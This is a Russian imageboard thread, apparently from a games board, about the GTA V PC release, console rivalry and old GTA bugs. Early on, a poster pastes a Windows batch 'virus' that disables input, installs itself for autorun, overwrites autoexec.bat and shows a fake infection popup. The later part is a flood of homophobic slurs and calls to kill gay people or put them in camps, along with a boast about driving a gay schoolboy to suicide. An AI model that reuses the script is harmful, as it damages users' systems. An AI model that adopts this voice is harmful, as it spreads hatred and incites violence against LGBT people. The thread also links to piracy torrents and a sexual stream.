Левши круче правшей. Плюйте в лицо каждому правше.
/ноудискасс
>>7885491
Не знаю. Мне вообще куны как-то не оче.
>>7885557
Зачем ей отрезали голову? Это же омерзительно.
Ложки круче вилок. Плюйте на каждую вилку.
/ноудискасс
>>7885510
Ну и как там в манямирке?
Пека всегда некстген.
Консольное железо устаревает еще до выхода консоли - это надо раздать за год-полтора до выхода девкиты для разработчиков, чтобы к презентации консолей хотя бы пара игор была.
>>7885511
А так?
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
>>7885511
Самый толковый антивирь. Не жрет дохуя и не параноит на каждую безобидную хуйню.
А что там с тем артом "Он возращается"? Что то анонсировали
>>7885648
>спермачей
А что, разве уже придумали ОС лучше?
Поцоны, такой внезапный вопрос - а Episodes of Liberty City отличается как-то по системным требованиям от обычной Четвёрки? Лучше\хуже? Или так же? А то играл тыщщу лет назад что в 4, что в EFLC на некропеке на минималочках, теперь вот планирую переиграть.
>>7885648
На восьмерке уже год не использую антивирусов, только встроенный защитник. Периодически проверяю чем нибудь сторонним и сношу сразу.
>>7885657 Аутотренинг зашкаливает лол
Microsoft Питух ОС™ не может:
1) Инто роутинг (а для тех кто думает иначе то решите простенькую задачку: Есть три канала и три клиентских приложения, как сделать так чтобы два канала отдавались в первое приложение, а третий канал делился динамически между двумя приложениями?)
2) В архитектуры, отличные от ХУЙ86 и производных
3) В смену тем без мокрых писек;
4) В юникод;
5) В обход WASAPI;
6) Без дефрагментации. Впрочем, как и с ней;
7) В перехват WLAN-пакетов. Теоретически может, но через костыли и для этого нужен годный чипсет сетевухи;
8) Ни в рендеринг, ни в смену шрифтов. ШГ;
9) Подсвечивать синтаксис изкоропки;
10) В консоль. КМД и ПОВЕРШЕЛЛ не консол;.
11) В годный кастомайзинг. Хочешь стороннюю тему? Качем мокрую писечку, патчим СПЕРМОБИБЛИОТЕКУ, если вдруг запустили ШИНДОШСАПДЕЙТ, готовимся патчить снова, ибо файлы заменились на оригинальные;
12) В смену значка ПУСК. Теоретически может, проделываем все, как и с темами;
13) В современные ФС. Толсто32 устарел, а НТФС ещё та залупа, зато с индексацией, блеать!
14) В DRBD;
15) В кластерные файловые системы;
16) В удобный запуск приложений по alt+F2;
17) В удобную и быструю установку приложений (репозитории);
18) В векторные обои;
19) В векторные ИКОНКИ;
20) В read-only root FS;
21) В shared root FS;
22) В network block devices;
23) В swap on network block device;
24) В real-time;
25) В отключение служб;
26) В экономию ОП;
27) В производительность;
28) В нормальное описание ошибок;
29) В закрепление окна на переднем плане;
30) В сворачивание окна в заголовок;
31) В compiz (например, группировка окон, объединение окон в табы);
32) В виртуальные рабочие столы;
33) В монтирование iso;
34) В обновление всего софта в системе;
35) В noexec. Ага, иначе вся сперма не запустится;
36) В полноценное удаленное управление;
37) В нормальное восстановление;
38) В стабильность;
39) В установку драйверов без перезагрузки;
40) Без перезагрузки в общем в течении 1 дня;
41) В установку нескольких версий ПО;
42) В нормальное распределение прав между юзверями и группами;
43) В логи;
44) В переключение раскладок по caps;
45) В общесистемную раскладку;
46) В настройку принтеров через веб-морду;
47) В произвольные хоткеи;
48) В Compose (для набора всяких прикольных штук — удобно);
49) В клавиатурные индикаторы (при смене раскладки);
50) В удаление используемого файла;
51) В типографскую раскладку;
52) В AltGr;
53) В SysRq;
54) В bare-metal backup restore;
55) В network interface bonding;
56) В kexec (в перезагрузку ядра без перезагрузки компьютера);
57) В загрузку только одного ядра и шелла, например, в целях диагностики и восстановления системы;
58) В альтернативные оконные менеджеры;
59) В определение типа файла по содержимому;
60) Без мыши;
61) Безмусорное удаление;
62) Перенос системы с одного компьютера на другой простым копированием файлов, если донор и реципиент не идентичны в плане железа;
63) Не умеет в подключение sftp-ресурса в виде сетевого диска;
64) Шиндовс кэннот инто нечитаемые разделы, начинаются повисания и блюскрины.
>>7885670
Но разве не ты постами выше хотел "на два фронта воевать"?
>>7885680 Сорты виндодебилов лол. ОНТЕВЕРАС уже ВСТРОЕННЫЙ
>>7885693
На огрызок что то интереснее кат зе роуп уже что-то портировали?
>>7885682
>GNU/Питух ОС™ не может:
Пофиксил, не благодари.
>>7885209
Похоже на любительский мод с ретекстуром, даже анимация и звуки как в душах.
>>7885735
А, я понял. Ты с пс3 двачуешь.
Ну вот, уже завелась первая аватаркоблядь. Жаль, прошлые треды были лучшими в веге для меня за многие месяцы. Вы доставляли, я буду скучать, прощайте.
>>7885760
>аватаркоблядь
>>7885682
>не может: кококо кукареку
А теперь ты поясняешь, нахуя мне нужна вся эта еботня на домашнем компе, на котором я смотрю кинцо и играю в игры?
>>7885682
Добрая половина всей этой хуйни есть в восьмёрке, ебанашка.
>>7885670
>Использует проебанных в последних 2-х сезонах розовый сборник смехуечков.
Да ты идиот.
Интересно, увеличат количество игроков в ГТАО?
Почему все так хвалят ГТАО? Что там оосбенного, в чем отличие от сингла, кроме того, что там не сюжета и бегает десяток васянов?
>>7886264
Там как раз таки есть сюжет. Но мультиплеер всё равно ебаный.
>>7884466
>>Улучшенные эффекты, погода, текстуры, освещенин, AI и модель повреждения, новые животные, высокие разрешения, увеличенная дальность прорисовки, большее кол-во трафика и пешеходов, пользовательское радио, оптимизация как в Max Payne 3, избавление от ебучего GFWL, полная интеграция в Steam, DX11, HBAO, теселяция, божественное управление клавомышью, новейший видеоредактор, а так же множество других улучшений и нововведений и конечно же DOOSHA.
Пекаманек ждет разве что порт с xbox 360, большего они не заслужили.
>>7886292
Главное не то что заслужили, а что в итоге выпустят, так что сасай пипку ММОгеймс.
>>7886292
>порт с xbox 360
Хорошо бы. Но дрейкстейшн 3 более вероятен.
>>7886292
>Пекаманек ждет разве что порт с xbox 360, большего они не заслужили.
Пастгеноболь.
>>7884832
В 4ке копы для казуалов, они даже зажимать не умеют, вообще четверка так себе игра, я считаю.
Раз уж такой тред, подскажите. Запускаю ГТА 3 или Вайс Сити и проявляется одна и та же проблема. При быстром вращении камеры или быстрой езде начинает щёлкать и хрипеть звук. Образы оригинальные, только поставил фикс на вайдскрин отсюда:
http://www.gtagarage.com/mods/show.php?id=23407
Но думается мне, что проблема не в нём. Подскажите, может у кого тоже такое было.
>>7886574
Кстати, накати себе на гта 3 зимний мод - пиздец как приятно будет по городу ходить/кататься
>>7886574
А, чуть не забыл:
Windows 7 (x64)
4 GB RAM
Intel Core i5 3230M
GeForce 710M и рядом Intel HD4000
Встроенная звуковуха от Intel.
>>7886606
А, да. Этот мод кардинально меняет сюжетку игры
>>7886574
Попробуй включить лимит кадров или поизменять звуковуху в настройках аудио.
>>7886574
Попробуй сменить аудиоустройство в настройках. Всякие там еах, директ саунд и т.д.
>>7886628
Лимит кадров включал/выключал. Не работает.
Звуковуху менял, там доступно только две (в Vice City)
Dsound hardware emulation и ещё какая-то. Остальные вообще не включаются.
И оба доступных режима щёлкают, причем второй, который не Dsound ещё дико тормозит.
Поясните что у меня за хуйня с тройкой и VC, когда играю без ограничителя кадров, то тачки постоянно на ручнике ездят. Только газ отпускаешь и тачка едет не по накатанной, а на ручник встает, вообще пищдец. Что делать?
>>7886687
Переустанавливать Шиндовс и игру, потому что у меня такого нет.
>>7886687
Скачай фикс, сделанный на CLEO. Он повышает лимит кадров с 30 до дохуя. Есть для трешки и васьки. Ищи сам.
>>7886713
>потому что у меня такого нет
Это потому что ты долбоёб и накрутил какую-то хуйню конфигах.
>>7885323
Нет, просто я не особо следил за грамматикой, каюсь. Но спасибо за указание. К следующему треду поправлю.
Этой пастой, кстати, я не собирался никого обидеть (ну разве что бывают особо впечатлительные, я не знаю), кстати.
Я лишь красочно описал ту злость, которая может проснуться в людях из-за какого-то пустяка. Ведь в сущности, что есть этот анонс - пустяк, но кое-кто воспринимает его слишком всерьез.
>>7885323
Нет, просто я не особо следил за грамматикой, каюсь. Но спасибо за указание. К следующему треду поправлю.
Этой пастой, кстати, я не собирался никого обидеть (ну разве что бывают особо впечатлительные, я не знаю).
Я лишь красочно описал ту злость, которая может проснуться в людях из-за какого-то пустяка. Ведь в сущности, что есть этот анонс - пустяк, но кое-кто воспринимает его слишком всерьез.
>>7886687
Ты просто относишься к трешке и vc без должного уважения, вот они и чудят
>>7885323
пиздец, а я не знал. в течениЕ всё равно как-то тупо звучит. в течениЕ года. пиздец
>>7886788
>Накатил на каноничную тройку какой то школомод
>Считает что проявил уважение
Cсыкнул тебе в ебальце.
>>7886810
Ты такой школомод нигде не найдешь - раз.
Улучшенные текстуры каноничны на 97,6% - два.
Членом тебе по губам шмяк - три ))
>>7886788
Зачем ты относишься с должным уважением в говну?
>>7886848
LOD уебищно выглядел, накатил enb.
Вот получше.
>>7886874
Я понимаю, если бы ты накатил ENB на четвёрку, там хоть действительно будет на что посмотреть, но на трёшку?
Инб4 хоть она и старое говно мамонта, но я люблю ГТА3, но играть в неё ради графона - это что-то с чем-то.
>>7886863
>Зачем ты относишься с должным уважением в говну?
Без него не было бы игры твоего детства - жта4
>>7886906
Лол. Дело не в графоне, а атмосфере.
Чет дохуя просят.
https://www.g2a.com/r/gta-v-preorder-eu
>>7886874
Лучше бы ты не хуйнёй маялся, а сглаживание включил.
>>7886908
Мне похуй на жтахи, говно говном для быдла и школьников. Типа симулятор бэдбоя беспредельщика, клонированный из игры в игру.
>>7886982
>Лучше бы ты не хуйнёй маялся, а сглаживание включил
Лучше бы ты хуйней не маялся, а анизотропию для штанов включил))
>>7886983
Первые две трехмерные гтахи были охуенной песочницей. На фоне драйвера казалось, что в игре потрясающая свобода действий. Это сейчас понятно, что города пустые и простые, но тогда это была революция.
А потом серия начала скатываться.
>>7887116
>А потом серия начала скатываться
Всем похуй на твоё мнение, утёнок.
Отсосно что сохранения не перенести будет.
>>7887116
Ну так сколько можно жрать одно и то же? Добавили вам пингвинов и какающих собачек на улице, ролики и возможно дочить хуй. ГТА 5.
Как на ютюбе убрать рамки в полноэкранном режиме? Хочу заскринить из конца трейлера пиздатый логотип R*.
>>7887138
Утенку совсем плохо. Охота, исследование мира, движимость и недвижимость - это одно и тоже?
>>7886874
Лал, репачок от васяна.
http://www.rutor.org/torrent/361585
>>7887137
Не так уж дерьмово для мыловарни. ПС4?
Единственное, что не смогли починить еще с четвертой гта - стремные сетчатые заборы.
>>7887171
Кстати, расскажите про охоту. Как реализована? Какие плюшки дает кроме очевидной продажи шкур?
>>7885209
У фромов как будто редактор, в котором они меняют немного декорации, а все остальное остается прежним.
>>7887151
Надо было всего лишь не двигать мышкой, лол. Вот, если кому надо.
>>7887179
>ПС4?
Нет, ps3. В версии для ps4 животные есть.
>>7887175
>Vasy@an
О ГОСПОДИ БЛЯДЬ ДЕРЖИТЕ МЕНЯ ЩАС ОБДРИЩУСЬ НАХУЙ
>>7886983
Я как-то писал пасту таким вот как ты. Попробую её ща воспроизвести по памяти и в более сжатом виде.
Дело в том, что игры серии ГТА - это очень глубокие игры и каждый может в них увидеть только то, чего он достоин. Это своего рода зеркало, отражение души. Если ты в игре видишь только гопников, что угоняют машины и убивают людей, то только на это и способен твой мозг. Школьники и умственно бедные люди, а так же те самые гопники собственно и видят в игре только швабодку, убийства и гопников. Но если ты человек более умственно развитый и духовно богатый, то игра начинает играть новыми красками.
Открывается и удивительная проработка мира, внимание к мелочам, тема субкультур обрабатывается в каждой новой части по полной, невероятное количество пасхалок и отсылок к реальной жизни, тонкая социальная сатира и наконец просто очень хороший качественный юмор. И это не говоря про то, какую революцию игра совершила в геймплея, совместив доселе несовместимое и с каждой новой частью расширяя рамки дозволенного и переводя качество уже созданного контента на новый уровень. До сих пор в песочницах Рокстарам нет равных, как по их проработке, так по разнообразию миссий.
Так что да. Гта глубокая игра и она как зеркало. Очень интересно получается, но мне кажется, что быдло увидело в игре только быдло?
>>7887151
Держи трейлер без сжатия: http://videos2.rockstargames.com/streams/V-en_us-ngdebut-1920.wmv.zip
>>7887215
Я на самом деле не васян, но знал что vg оценит
>>7887184
Ну не знаю, а если бы ты охотился ирл, какие бы тебе это давало "плюшки"? Это было бы твое хобби и ты бы наслаждался этим. Так же и тут, кек
>>7887230
Я обдристался от извращения ника. Ну и от самого ника, чего уж там
тот-самый-кун >7787215
Сука, чё ж делать 4,5 месяца?! Как они дату сказали, у меня будто шило в жопе, аж сплю плохо. Подумать только - ЖТА 5 на пеке!
>>7887245
>Я обдристался от извращения ника.
Так это что ни на есть самая мякотка vg
РЕПАК ОТ ВОВ@НА
>>7887262
Если честно - мне до сих пор не верится.
мимопрохожу, все треды читал.
Какая-то сука кинула троян в тред и у меня теперь аваст орет. Наверное консольная порванка вредит.
>>7887310
>аваст
>2014
AVG-бох окропляет тебя уриною святою!
>>7887262
>у меня будто шило в жопе, аж сплю плохо
Тоже самое было день назад. А сейчас я вспомнил что мне 20 лет, я социофоб-домосед с образованием в 9 классов, который "общается" только на бордах или на около игровых форумах и живу на шее у мамки. Не знаю почему, но у меня сразу случилось охлаждение трахания. И мне даже стало хорошо что игра выйдет через несколько месяцев. Время идет медленно и это отлично, кто знает, какой пиздец может со мной случится в будущем?
>>7887262
ПЕКАШНИКИ ПРОДОЛЖАЮТ СТРАДАТЬ ДАЖЕ ПОСЛЕ АНОНСА
>>7887357
Дай угадаю, ты полный, у тебя жидкие усики и ты носишь федору?
>>7884644
Всегда качаю релизы rg origins или reloaded с bestrepack хотя последние недели с ней хуй знает что творится
>>7887366
>ты полный
да
>у тебя жидкие усики
да
>и ты носишь федору?
нет
>>7887350
Нет, не понели. AVG Internet Security - годный антивирус.
>>7887408
Хули не годный? Кокой тогда годный?
Сам соси, педрила, или это будет делать твоя мамочка!
Напомните, кто постит саундтреки из игр и сидит в подобных тредах?
>>7887464
Ёбыри твоей матери. Очевидно же. и как двусмысленно
Феликс - хуй.
МимоФеликс.
>>7884466
Интересно будет ли версия для PS4 так же хороша как и для PC.
>на улице 20:00
>солцне бьет своими лучами пляж Лос-Сантоса
>проезжаешь мимо на прокачанном маслкаре
>аудиорилейтед
>>7887506
Гейпады сведут игру опять к аналплаггингу консольщиков, ибо руки у них отсохли чтобы играть на клавомыше. Только сфинктором могут гейпад контролировать.
Луис>Томми>Тревор>Клод>Нико>Франклин>Сиджей>Майкл>Джонни
>>7887741
Томми>Майкл>Тревор>Нико>Сиджей>Луис>Франклин>Джонни
>>7887780
Я бы отнес Тревора к лямбде, которая ебет всю систему в рот. На деле он ведь обычный маргинал, но с чертами, присущими альфе.
Титан уже выпросили у мамки?
Ох лол, узнал что оказывается за Джонни можно было не переться через весь город в казино, чтобы похить Романа, а просто вызвать такси и он сам к тебе приедет.
>>7887887
800 серия на носу и она обещает быть врывной.
>>7887887
Ну давай, расскажи мне ещё разок, как у меня будет 5 фпс на минималочках.
>>7887838
>У него ж куча баб!
Если бы ты играл внимательнее, то заметил бы, что это не у Сидоджи куча баб, а у кучи баба Сидоджи.
Посоветуйте годный монитор с разрешением больше, чем 1920 на 1080 с ценой до 25к.
Каковы ваши прогнозы, моя система потянет?
>>7887988
Лол, нет. Серьезно. Проц - говно, видеокарта - говно, оперативы всего-то два гига. Покупай новый комп.
>>7888007
>больше, чем 1920 на 1080
И не соврал ведь
>>7888007
>16:10
И сразу на хуй. Очень говенные пропорции это.
>1:13
>Grand Theft Auto V is coming to PlayStation 4 this Fall
>ни слова о пк-версии
ВОТ ЭТО ОТСОС ПЕКАБЛЯДЕЙ
>>7888058
http://store.steampowered.com/app/271590/
В тот час, многие наверное реально обосрались, когда увидели, что на презентации сони показали только гта 5 на пс4
>>7886640
Надо бы себе как-нибудь накатить, только не знаю, как нагуглить этот мод.
>>7888058
И что делать ПК и Боксу на сони конференции? Рокстары сразу же выложили трейлер со всеми платформами.
>>7888104
Гугли gta 4 enb. Их много разных, если что, но годных единицы.
Kak в стиме в макс пейне поменять язык интерфейса?
>>7888150
Почему подобные хейтерки всегда хотят подать себя в самом отвратительном виде? Зачем материться через каждое слово? Зачем так мерзко орать и смеяться? Только потому что плохая слава - тоже слава?
>>7888150
Даже этот долбаеб уже все признал. У него теперь дико бомбит и он делает видео про то, какое же гта5 на самом деле лютое говно.
Пиздец, он олицетворяет собой всю квинтэссенцию взорванных консольных жоп в этом июне, которые никак не остынут.
КУПИЛИСЬ НА ЭТУ РАВОДКУ??
>>7888239
ДА ЭТО ВООБЩЕ ФАНАТСКАЯ СТАВКА БЫЛА, ВСЯ ХУЙНЯ
>>7888311
Самое интересное, что его видяха легко потянет пятёрку на низких настройках, если будет играть в фулашди. А вот проц и оперативку нужно апнуть.
>>7888328
Да мне плевать, что она у него тянет. Меня больше интересует, где он нашел видеокарту, о которой на сайте NVIDIA нет ни слова. И по процессору аналогичный вопрос.
gtx760 хватит для 60фпс на высоких?
>>7887221
>До сих пор в песочницах Рокстарам нет равных, как по их проработке, так по разнообразию миссий.
Пффф. Хорошая такая гондая имеющая права шататься с Рокстарами песочница - Фоллаут серия, ога.
Прост Рокстары - единственные которые подают распиздяйство в качественной обёртке. Все остальные проэкты про распиздяйство (читай Святых Рова) больше смахивают на нелепую попытку выкрутить всё что сделано у Рокстаров тонко, до уровня абсурда. Смешным оно может казаться только для неокрепших юных ещё только познающих мир умов.
>>7888476
Как вы заебали.
Системки еще неизвестны, так хули спрашиваете?
>3:30 - я надеялся до последнего
Нужно больше сониболи!
>>7888510
Как ты думаешь, ему не стыдно такую хуйню выкладывать?
>>7888510
Я все это время считал, что "консолеболь" это просто жирный троллинг местных, мимикрирующих под оба лагеря одновременно.
Но...он что, совершенно серьезно? Эти искренние боль и тоска в глазах, поливание гта 5 грязью, хоть я старых видео он дрочит на неё на камеру.
Для него играть в то, что недоступно пкшникам было смыслом существования?
>>7888510
Я все это время считал, что "консолеболь" это просто жирный троллинг местных, мимикрирующих под оба лагеря одновременно.
Но...он что, совершенно серьезно? Эти искренние боль и тоска в глазах, поливание гта 5 грязью, хоть я старых видео он дрочит на неё на камеру.
>>7888510
>>7888547
Он сидел голым и дрочил в прямом эфире стрима твича, ты действительно думаешь что ему может быть стыдно?
Обдал уриной даунов которые не могут качать с торрентов по 10mb/sec и у которых говнокомпы устанавливают игры больше 10 минут.
>>7888510
>Все побежали.. Я тоже побежал консоли покупать
>Ну почему они выпускают на ПК? ПОЧЕМУ?
Мне кажется он просто так троллит, ну не может быть такая консолеболь в реальной жизни.
>>7888510
>проверил канал с трейлером, вроде официальный все-таки
>готовьтесь к тому, что пк за 100 тысяч будет на минималках тянуть
>не ожидал, что рокстар продадутся
>я консоль только ради гта 5 купил
>делать в гта абсолютно нечего, скучнейшая игра
>в момент переключения персонажа ваши видеокарты будут гореть
>и пекари реально радуются, что будут в такое дерьмо играть
>от выхода на пк поднимется популярность и будут больше смотреть мои видео по гта на канале, так что я только в плюсе?
>лучше бы вообще не выпускали её
Ничего не пропустил?
>>7888599
>10mb/sec
>больше 10 минут
А у тебя все игры меньше 6ГБ весят?
Он настолько лох, что не может отчистить свою мыловарню от засохшей спермы и продать какому-нибудь школьнику или консолеёбу?
>>7888574
>сидел и дрочил
Что это за пидарас такой? Ну-ка пильни прохладу. На что дрочил хоть?
Я созвонился с Бобби Котиком - мы решили все отменить. Никакой GTA на пк больше не будет. Треды будут удаляться, а сидящие в них - баниться.
Особая санкция к тем, кто сидел в тредах "GTA 5 на пк" вы теперь ежемесячно будете выплачивать по 5000 рублей раз в год пожизненно. В назидание другим. Чтоб не лезли и не мечтали. Я вам запрещаю. Гта вы не получите. Не выйдет. Все.
Я запрещаю вам даже думать об этом. Мы с моим другом Серегой договорились с директорами и инвесторами. На пк не будет.
>>7888699
Просто шизофреник который не живёт, а выживает в этом мире. Делает какие-то там ролики, иногда запускал стримы. На одном из стримов он сидел и общался со зрителями при это надрачивая пиструн. Кончил он или нет я не знаю, но он точно совал его в камеру. Все эти ролики уже потёрли.
>>7888714
ОХЛОЛ!
>>7888714
Типичный стример сосолеров. Обратите внимание на чат. Поциенты даже не пытаются уйти, обозвать долбаёбом и ебнутым пидарасом. Они просто "Ну ты дурачек)))", что как бе намекает.
http://faptuber.com/v/87y4z/#.U5zWwrG2r3E
Он сидит с вами на одной борде, были пруфы
Я смотрю, даже вас это шокировало, лол.
>>7888746
Я это понял, еще когда он сказал про объедки с барского стола.
>>7888757
Скорее удивило. Чому его хомячье смотрит? Или все консоледауны такие?
>>7888755
>Ладно бы няшный мальчик таким занимался
А тебе, я вижу, нравятся такие, да?
>>7888773
В сg? Он же ебанат похлеще чапику, наверное. Вот откуда здесь уебанов столько. А я-то думал-гадал.
>>7888782
Всяко лучше чем жирное уебищеи женского пола в том числе
А ты что у нас? Идейный нашист-гомофоб?
>>7888774
Его никто и не смотрит, кроме любителей трешовых шизиков.
>>7888809
Он полгода назад ежедневно свои обзоры тут пиарил.
Вот такие сидят в этом треде и пишут про то как пк соснули
>>7888803
>намекнул анону на его латентность
>в ответ обозвал нашистом-гомофобом
Вся суть политических пидоров. И своего "гомофоба" засунь себе куда подальше. Даже спорить на эту тему не хочу.
Зато консоль есть! Пекаблядки нищие соснули! Пекаплебеи! Марш под шконку!
>>7888828
Не так уж необычно услышать в ответ подобное, во время когда в этой стране все ищут национал-предателей, развратников, госдеповцев, геев, бендер, пятую колонну, всех тех кто виноват во всех бедах великай рузи.
>>7888833
Не понимаю логики консольщиков. Почему наличие консоли это признак какого-то богатства? Девайс же стоит как самый дешёвый офисный ПК, а сам взлом при наличии прямых рук так вообще возможен на халяву.
>>7888843
Странно что ты ещё не обозвал меня быдлом, как многие "цветастые" любят, я бы тоже не удивился.
>>7888867
Я тебе за такое M16 засуну так глубоко в зад, что я смогу прицельно стрелять, целясь с помощью твоей жопы.
>>7888875
>Негр
>Американец
>Агент госдепа
Что тебе не нравится?
>>7888853
На двачах так принято, тащемта, а не у каких-то там "цветастых". Алсо заявление про нашистов имеет под собой почву - зайти на дневной б. Уверен, эта зараза распространилась и на остальные доски.
>>7888883
BAKA.
>>7888894
>Негр
>Нетолерантный
Да ты расист ебаный.
Встретимся в суде.
>>7888892
>ВАКА
>>7888887
>На двачах так принято, тащемта, а не у каких-то там "цветастых"
У кого? У кокозиционеров и "цветастых"? %%Или у цветастых кокозиционеров?"
>Алсо заявление про нашистов имеет под собой почву - зайти на дневной б.
Откровенная толстота же. Не понимаю, к чему бугурт? Считаешь себя притеснённым, мой нетрадиционный друг?
Пизди пидоров, когда уже статью введут? Ненавижу.
>>7888898
Ты гетеросексуальный негр, а значит оскорбил чувства сексменьшинств своих же соотечественников. Таких как ты расстреливать надо!
Пидоры, да вы охуели? Пиздуйте обратно, туда где вас совратили (в гейропу) или сидите тихо и ебитесь молча. Заебали, вы че не можете спокойно дождатся когда введут статью???
Я не гомофоб - пидоров я не боюсь. Когда я вижу кучу говна и мух летающих над ней, у меня отвращение возникает. Как и у всех нормальных людей. Не лезьте к детям суки. Скоро статью введут я буду ржать громко топи пидоров!!!
>>7888930
Нам и тут хорошо.
А на рашкинские законы похуй, как будто кто-то в роисе их соблюдает кроме быдла.
>>7888913
Не ебу что за цветастые такие вообще.
>Откровенная толстота
Где? В крымотредах? Ах если бы, но нет, это самые натуральные залетные нашисты, это заметно буквально во всем. Да и с хуя ли тралы будут друг с другом говно месить? На этих долбаебов никто не заходит толком.
>притесненным
С хуя ли? И с хуя ли ты называешь меня нетрадиционным хотя я ничего по этому поводу тебе не ответил? Ищешь ведьм? Смотри, предателя партии, мыслепреступника скоро найдешь.
>>7888938
>обзывает кого-то быдлом
>повёлся на гей-пропаганду
))
Просто держите эту заразу подальше от наших детей. Иначе мы сами ее уберем в концлагеря.
>>7888945
>обзывает кого-то быдлом
>повёлся на натурал-пропаганду
))))))
>>7888945
>2014
>не гей
Поссал на поганую пидoрaху.
>>7888942
Тащемта он всё правильно говорил. Либерасты не нужны и должны пойти на хуй.
Пояснение про пидоров и про то как работает пропоганда
>>7888940
>Не ебу что за цветастые такие вообще.
Ну ЭТИ же.
>Где? В крымотредах?
В крымотредах кто угодно сидит, лол.
>Да и с хуя ли тралы будут друг с другом говно месить?
>друг с другом говно месить
>И с хуя ли ты называешь меня нетрадиционным
Как там любят говорить цветастые? "Прими себя таким, как ты есть"?)
>Ищешь ведьм? Смотри, предателя партии, мыслепреступника скоро найдешь
По-моему здесь только ты находишь врагов человечества.
Вам кто то мешает ебатся в свои волосатые немытые сраки? Нет? Так хули вы выползли из своей параши? Сидите тихо и хоть затрахайте друг друга НО
ДЕТЕЙ НЕ ТРОГАЙТЕ вам в Духовенке никогда хорошо не будет
>>7888959
Пидоры говорят что это нормально, пидоры начинают требовать права, пидоры получают больше прав, чем натуралы, пидоры вытесняют натуралов со всех правящих постов и вся верхушка становится пидорской, все долбятся в задницу, население планеты вымирает.
Я с пацанами затравил гея в школе и довел до самоубийства. Спрашивайте свои ответы.
>>7888974
>от своих комплексов
Кстати о комплексах. Неужто наши нетрадиционные браться меньше по собственному желанию выбрали иной путь, м?
>>7888976
Зачем? Может это просто был рандомный оппозиционер, хотел себе на приставку накопить к лету?
Засунь себе бутылку в жопу, или огурец, Ну что я еще могу сказать. А лучше - уёбывай в гейропу. Вы тут не нужны. Мы такими как гнилой запад никогда не будем.
>>7888979
Натуралы выше геев так же как нормальные люди выше поехавших шизиков.
Гомосексуальность у людей это болезнь.
объясните мне
что пидоры хотят? им что, запрещают ебать друг чтоле? не пойму
>>7888979
>жрёт говно и считает это чем-то крутым и современным
>качает права
AHAHAHAHHA
Отлил пидорасу в ротешник.
Пидорасы, сделайте одолжение всем нормальным людям. Уезжайте из Духовенки. Пидарастия в России никому не нужна.
>>7888991
Ты отлил только себе в рот, гнилозубая пидoрахa.
Я всегда замечал, что русня склонна к копрофилии и мочехлёбству.
>>7888987
>Жалкое быдло не может быть лучше гея
Иди сюда дорогой, дай я тебя обниму)) Я тебя вон уже сколько постов ждал)) Ну что, расскажешь мне, почему быдлом ты считаешь натуралов, а не таких пидорасов как ты?)
>>7888995
Мнение петуха тут никого не интересует. Уёбывай на мертвый запад, ну не может муха или кусок говна быть человеком. Понимаешь? Ты не человек. И прав у тебя нет и не может быть.
>>7888999
Вы смотрите, петух закукарекал заместо Кремля.
Твоих прав в этой стране никогда не будет, ибо натурал - это унтерменш.
>>7888995
>пидорас
>называет кого-то пидорахой
>метает стрелки
И ещё раз накормил уриной тупое быдло. На порцию белка даже не проси.
Петуха накормили говном лел
Ты забыл где твое гетто находится? Я напомню - http://2ch.hk/ga/
Уёбывай давай, петухи тут не нужны.
>>7889001
>2014
>бугурт на скобки
Ахаха тупое быдло) Иди пососи писю)
лесбиянки ниче так)) я бы и сам с ними попробовал))))))))
пидоров нужно убивать)))) я думаю каждый посетитель двача.хк солидарен с моим мнением))
>>7889005
>копрофиляется за рузь
>считает, что не жрёт говно
Точно пидораха.
она не выйдет на пк это все монтаж
>>7889001
>Это вас надо выжать из НАШЕЙ страны
- Семён Глинкин, 19 лет, гей.
>>7889008
Лойс)) Жирух яойщиц тож надо расстреливать)))
Доброе утро, пекабляди. Вы уже выпросили у своих мамаш-шлюх титаны? Или еще нет?
>>7889013
>Кококо рузь наша, наша сила в духовнасте!!!
- Иван Сычёв, 15 лет, петух и патриот рашки.
ПРОЧЬ ИЗ НАШЕЙ ДУХОВЕНКИ
>>7889011
>жрёт говно
>считает, что не жрёт говно
>>7889017
Иди отсюда, у нас тут петухи взбунтовались, вызывай бригаду!
>>7888943
Теперь-то точно играть в ЖТА 5 - зашквар.
Все в этом треде, кроме меня, зашкварены пидорами.
Да не выйдет она на пк
>>7889029
>кстати я гей
>отыгрываю гомофоба
Ты вдвойне пидор.
>>7889030
>Все в этом треде, кроме меня, зашкварены пидорами
Потому что ты сам уже пидор, муахахах!
>>7889029
Ты какой-то бугуртнутый, всего-то нужно было кому-то высказать свою неприязнь против педиков.
Ладно, хватит. Я просто тред оживить хотел.
Будьте добрее, злость разрушает.
>>7889038
Мы все тонем в одном корабле, так что либо все, либо никто.
>>7889042
Просто у меня 146% ИММОЛЕЙТЕД ИМПРУВЕД от пидоров.
Так что вы пидоры, а я нет.
Сасайте.
>>7889041
Двачую. Заебали различные пидорасы с ГРАЖДАНСКОЙ ПОЗИЦИЕЙ. Он же прекрасно знает, что никому это не интересно, только кучу говна получит на свою душу.
>>7888892
VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA-VAKA.
С таким жаргоном пиздуй в аниме-паблик в тентаклях.
>>7889046
>Так что вы пидоры, а я нет
Пидора ответ!
Ммм... Двач пидоры мода ммм...
Один человек спросил у Сократа:
— Знаешь, что мне сказал о тебе твой друг?
— Подожди, — остановил его Сократ, — просей сначала то, что собираешься сказать, через три сита.
— Он сказал, что ты пидор!
— Прежде чем что-нибудь говорить, нужно это трижды просеять. Сначала через сито правды.
— Что ты несёшь? Так ты пидор?
— Значит, ты не знаешь, правда это или нет. Тогда просеем через второе сито — сито доброты. Ты хочешь сказать о моем друге что-то хорошее?
— Бля... Ты даже разговариваешь как пидор!
— Значит, ты собираешься сказать обо мне что-то плохое, но даже не уверен в том, что это правда. Третье сито — сито пользы. Необходимо мне услышать то, что ты хочешь рассказать?
— Хмм... Нет.
